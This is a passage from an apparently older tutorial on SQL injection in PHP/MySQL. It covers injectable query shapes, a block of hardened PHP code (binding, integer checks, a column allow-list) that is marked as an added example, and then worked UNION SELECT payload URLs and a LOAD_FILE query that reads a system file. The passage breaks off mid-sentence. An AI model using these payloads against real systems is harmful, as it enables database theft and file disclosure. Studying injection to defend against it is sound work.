SQL injection attacks on PHP/MySQL
Take a look at the following query:
$query = "SELECT * FROM user WHERE user = '" . $_REQUEST['user'] . "'";
... SQL injection is impossible. However, if the value is being placed in a non-delimited portion of the query, such as a numeric value, table or column name:
$query = "SELECT * FROM user ORDER BY " . $_REQUEST['user'];
or
$query = "SELECT * FROM user WHERE max_connections = " . $_REQUEST['user'];
... then SQL injection is still possible.
Injection is also possible in a query like this:
$query = "SELECT * FROM user WHERE user = ({$_REQUEST['user']})";
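The hardened counterparts of the three query shapes above, as an added example that is not part of the original page. The function names, the SORTABLE allow-list and the sample inputs are assumptions made for illustration; only the 'user' table and its 'user' and 'max_connections' columns come from the page.

```php
<?php
declare(strict_types=1);

// Assumed allow-list of sortable columns. Identifiers cannot be bound as
// parameters, so the only safe source for them is a fixed list.
const SORTABLE = ['user', 'host', 'max_connections'];

/** Quoted string context: bind the value instead of concatenating it. */
function by_user(string $user): array
{
    return ['SELECT * FROM user WHERE user = ?', [$user]];
}

/** Numeric context: quote escaping does nothing here, so require an integer and bind it. */
function by_max_connections(string $raw): array
{
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($n === false) {
        throw new InvalidArgumentException('max_connections must be a non-negative integer');
    }
    return ['SELECT * FROM user WHERE max_connections = ?', [$n]];
}

/** Identifier context: only names from the allow-list ever reach the SQL text. */
function ordered_by(string $column): string
{
    if (!in_array($column, SORTABLE, true)) {
        throw new InvalidArgumentException('unsupported sort column');
    }
    return 'SELECT * FROM user ORDER BY `' . $column . '`';
}

// Constructed sample inputs: a benign value and one shaped like a UNION request.
foreach (['10', '1 union select @@version'] as $raw) {
    try {
        [$sql, $params] = by_max_connections($raw);
        echo $sql, ' <- ', json_encode($params), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected numeric input: ', json_encode($raw), PHP_EOL;
    }
}
foreach (['host', 'no_such_column'] as $column) {
    try {
        echo ordered_by($column), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected sort column: ', json_encode($column), PHP_EOL;
    }
}
```

The returned SQL and parameter list are meant to be passed to a prepared statement, for example PDO's prepare() followed by execute($params).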
If we want to return other useful data, apart from the 'user' table, we can use the 'UNION' statement to combine two result sets. Since the 'UNION' statement comes after the 'WHERE' clause in a select statement, we can choose any data we like, within the following restrictions:
• Our select statement must return the same number of fields as the original (31 if you count them, or do a 'describe user')
• The data types of our fields must match, or it must be possible to implicitly convert between the two
• If our data contains text fields, they will be truncated to the length of the corresponding text field in the first query
Let's say we want to return the '@@version' string. We would request something like:
http://mysql.example.com/query.php?user=1 union select @@version, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1
We can select arbitrary fields from other tables using 'union select'. For example, suppose we wanted to retrieve the 'name' and 'dl' fields from the 'func' table:
http://mysql.example.com/query.php?user=1 union select name, dl, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from func
Using 'UNION', an attacker can effectively access all of the data that the calling application can access.
LOAD_FILE function
The LOAD_FILE function returns a string containing the contents of a file, specified by its path. So, for example, on a Windows box, the query
select load_file('c:/boot.ini');
... will retrieve the contents of the boot.ini file. Obviously inte